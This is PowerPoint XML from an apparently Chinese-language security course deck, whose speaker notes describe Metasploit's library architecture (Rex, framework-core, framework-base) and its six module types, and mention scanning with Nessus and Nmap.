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1.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739" r:id="rId2"/>
    <p:sldId id="938" r:id="rId3"/>
    <p:sldId id="939" r:id="rId4"/>
    <p:sldId id="1214" r:id="rId5"/>
    <p:sldId id="1115" r:id="rId6"/>
    <p:sldId id="1172" r:id="rId7"/>
    <p:sldId id="943" r:id="rId8"/>
    <p:sldId id="1031" r:id="rId9"/>
    <p:sldId id="978" r:id="rId10"/>
    <p:sldId id="980" r:id="rId11"/>
    <p:sldId id="966" r:id="rId12"/>
    <p:sldId id="1082" r:id="rId13"/>
    <p:sldId id="968" r:id="rId14"/>
    <p:sldId id="1116" r:id="rId15"/>
    <p:sldId id="1089" r:id="rId16"/>
    <p:sldId id="1117" r:id="rId17"/>
    <p:sldId id="972" r:id="rId18"/>
    <p:sldId id="1193" r:id="rId19"/>
    <p:sldId id="1194" r:id="rId20"/>
    <p:sldId id="1215" r:id="rId21"/>
    <p:sldId id="1083" r:id="rId22"/>
    <p:sldId id="1085" r:id="rId23"/>
    <p:sldId id="1088" r:id="rId24"/>
    <p:sldId id="1216" r:id="rId25"/>
    <p:sldId id="1077" r:id="rId26"/>
    <p:sldId id="1076" r:id="rId27"/>
    <p:sldId id="1006" r:id="rId28"/>
    <p:sldId id="970" r:id="rId29"/>
    <p:sldId id="1005" r:id="rId30"/>
    <p:sldId id="1078" r:id="rId31"/>
    <p:sldId id="1080" r:id="rId32"/>
    <p:sldId id="977" r:id="rId33"/>
    <p:sldId id="1224" r:id="rId34"/>
    <p:sldId id="1178" r:id="rId35"/>
    <p:sldId id="1218" r:id="rId36"/>
    <p:sldId id="1219" r:id="rId37"/>
    <p:sldId id="1189" r:id="rId38"/>
    <p:sldId id="1221" r:id="rId39"/>
    <p:sldId id="1222" r:id="rId40"/>
    <p:sldId id="1175" r:id="rId41"/>
    <p:sldId id="1195" r:id="rId42"/>
    <p:sldId id="1223" r:id="rId43"/>
    <p:sldId id="1176" r:id="rId44"/>
    <p:sldId id="1177" r:id="rId45"/>
    <p:sldId id="1119" r:id="rId46"/>
    <p:sldId id="1173" r:id="rId47"/>
    <p:sldId id="1217" r:id="rId48"/>
    <p:sldId id="1198" r:id="rId49"/>
    <p:sldId id="1197" r:id="rId50"/>
    <p:sldId id="1200" r:id="rId51"/>
    <p:sldId id="1226" r:id="rId52"/>
    <p:sldId id="1135" r:id="rId53"/>
    <p:sldId id="1196" r:id="rId54"/>
    <p:sldId id="1199" r:id="rId55"/>
    <p:sldId id="1206" r:id="rId56"/>
    <p:sldId id="1128" r:id="rId57"/>
    <p:sldId id="1150" r:id="rId58"/>
    <p:sldId id="1190" r:id="rId59"/>
    <p:sldId id="1131" r:id="rId60"/>
    <p:sldId id="1225" r:id="rId61"/>
    <p:sldId id="1147" r:id="rId62"/>
    <p:sldId id="1182" r:id="rId63"/>
    <p:sldId id="1148" r:id="rId64"/>
    <p:sldId id="1039" r:id="rId65"/>
    <p:sldId id="1040" r:id="rId66"/>
    <p:sldId id="1041" r:id="rId67"/>
    <p:sldId id="1104" r:id="rId68"/>
    <p:sldId id="1035" r:id="rId69"/>
    <p:sldId id="272" r:id="rId70"/>
    <p:sldId id="260" r:id="rId71"/>
    <p:sldId id="1094" r:id="rId72"/>
    <p:sldId id="1038" r:id="rId73"/>
    <p:sldId id="1183" r:id="rId74"/>
    <p:sldId id="1167" r:id="rId75"/>
    <p:sldId id="1205" r:id="rId76"/>
    <p:sldId id="1191" r:id="rId77"/>
    <p:sldId id="813" r:id="rId78"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6797675" cy="9928225"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="zh-CN"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial"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228"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ongliang bi" initials="hb" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="35ce84e352b98f6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00"/>
    <a:srgbClr val="1045C9"/>
    <a:srgbClr val="1045C0"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="002A51"/>
    <a:srgbClr val="20809E"/>
    <a:srgbClr val="F00000"/>
    <a:srgbClr val="00FF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21" autoAdjust="0"/>
    <p:restoredTop sz="79099" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="61" d="100"/>
          <a:sy n="61" d="100"/>
        </p:scale>
        <p:origin x="78" y="30"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2228"/>
        <p:guide pos="3840"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="-6636"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="53" d="100"/>
          <a:sy n="53" d="100"/>
        </p:scale>
        <p:origin x="2844"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50443" y="0"/>
            <a:ext cx="2945659" cy="498135"/>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6CD27D43-9FEC-4E41-B11D-8BC734EB588F}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2024/10/18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="幻灯片图像占位符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8" name="灯片编号占位符 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850443" y="9430091"/>
            <a:ext cx="2945659" cy="498134"/>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80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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o.csdn.net/so/search?q=%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F&amp;spm=1001.2101.3001.7020"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so.csdn.net/so/search?q=Kali&amp;spm=1001.2101.3001.7020"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so.csdn.net/so/search?q=%E5%91%BD%E4%BB%A4%E8%A1%8C&amp;spm=1001.2101.3001.7020"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0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1536292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err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>搭配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>进行漏洞扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>并使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>进行漏洞利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2606437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这张图是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>metasploit</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的它的内部实现的一个基本的体系结构，在中间的位置这是基础的库文件，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs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800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>）基础库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>基础库文件位于源码根目录路径下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>libraries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>目录中，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Rex,framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>-core</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>framework-base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>三部分。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Rex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>是整个框架所依赖的最基础的一些组件，如包装的网络套接字、网络应用协议客户端与服务端实现、日志子系统、渗透攻击支持例程、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>数据库支持等；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>framework-core</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>负责实现所有与各种类型的上层模块及插件的交互接口；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>framework-base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>扩展了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>framework-core</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>，提供更加简单的包装例程，并为处理框架各个方面的功能提供了一些功能类，用于支持用户接口与功能程序调用框架本身功能及框架集成模块；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>）模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>模块组织按照不同的用途分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>种类型的模块（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>）：分为辅助模块（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Aux)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>、渗透攻击模块（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Exploits)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>、后渗透攻击模块（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Post)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>、攻击载荷模块（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>payloads)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>、编码器模块（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Encoders)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>、空指令模块（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs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800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
